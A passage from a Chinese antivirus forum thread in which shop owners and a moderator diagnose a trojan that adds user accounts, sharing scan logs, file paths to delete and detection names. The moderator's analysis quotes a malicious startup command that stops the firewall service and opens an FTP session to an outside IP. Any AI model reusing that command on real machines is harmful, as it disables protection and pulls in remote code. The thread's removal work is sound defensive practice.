123   2  /  3  页   跳转

net use bye xuzijianyes /add(net病毒)

回复: net use bye xuzijianyes /add(net病毒)

在c:\windows\system32下面,找到了木马作者的自我介绍:
斯文哥又来抓鸡了,唉QQ413968336
斯文哥又来抓鸡了,唉QQ413968336
斯文哥又来抓鸡了,唉QQ413968336
子健哥又来抓鸡了,唉QQ413968336
子健哥又来抓鸡了,唉QQ413968336
子健哥又来抓鸡了,唉QQ413968336
子健哥又来抓鸡了,唉QQ413968336
Sun网络 www.muhuo.com
冷炫哥哥在次辉煌起来QQ 11156454.
清风可否吹走破碎的梦。

附上我找到的可疑文件:

附件: 新建文件夹.zip (2011-5-31 17:35:08, 802.13 K)
该附件被下载次数 325

gototop
 

回复: net use bye xuzijianyes /add(net病毒)

这木马真小人,放那么多东西,害我电脑什么都用不了,只能移动鼠标查看东西了。
附上扫描文件:

附件: SREngLOG.log (2011-5-31 17:50:23, 143.84 K)
该附件被下载次数 263

gototop
 

回复:net use bye xuzijianyes /add(net病毒)

能否留QQ交流
gototop
 

回复: net use bye xuzijianyes /add(net病毒)

我QQ号码是475553712
gototop
 

回复 9F 吴文和 的帖子

此样本已收集反馈。另12楼的日志分析如下:下载此工具:http://bbs.ikaka.com/attachment.aspx?attachmentid=653828删除以下文件
c:\documents and settings\all users\application data\storm\update\%sessionname%\yetgd.cc3
c:\documents and settings\all users\drm\%sessionname%\dlvvm.cc3
c:\documents and settings\all users\application data\storm\update\%youshizhuay%\fbguc.cc3
启动项目 -- 注册表之如下项删除:
[shell]    <c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 14.210.97.246 >
shell如果无法删除可以添加everyone并设置完全控制权限之后再删除此项。
另如方便请将c:\program files\benchi.exe压缩发来。
gototop
 

回复 11F 吴文和 的帖子

11楼样本瑞星可以查杀

gototop
 

回复 15F networkedition 的帖子

谢谢大版主。benchi.exe估计被我删除了。而且对方系统也还原了。应该还有其他店铺电脑存在相同问题,我找到了压缩上来。这木马释放的文件太多了,我也只是找到了一部分。找到可疑文件后我也会压缩放上去。
gototop
 

回复 16F networkedition 的帖子

为了不影响店铺销售,我直接恢复了系统,其他盘符未作任何处理,留待查看。有新的可疑文件马上压缩过来。谢谢大版主,谢谢广大网友。
gototop
 

回复:net use bye xuzijianyes /add(net病毒)

9楼样本:
1、文件名:nqmwj.mp3

病毒名:Trojan.Win32.Fednu.ddh

2、文件名:yetgd.cc3

病毒名:Backdoor.Win32.LastOne.tc

3、文件名:lcoef.cc3
不是病毒
gototop
 

回复 8F networkedition 的帖子

今天发现了新net病毒变种,不知道对大版主有用没?先传扫描文件,具体上传哪些文件等待大版主通知。



扫描文件:

附件: SREngLOG.log (2011-6-27 11:01:33, 43.39 K)
该附件被下载次数 242

最后编辑吴文和 最后编辑于 2011-06-27 11:01:33
gototop
 
123   2  /  3  页   跳转
页面顶部
Powered by Discuz!NT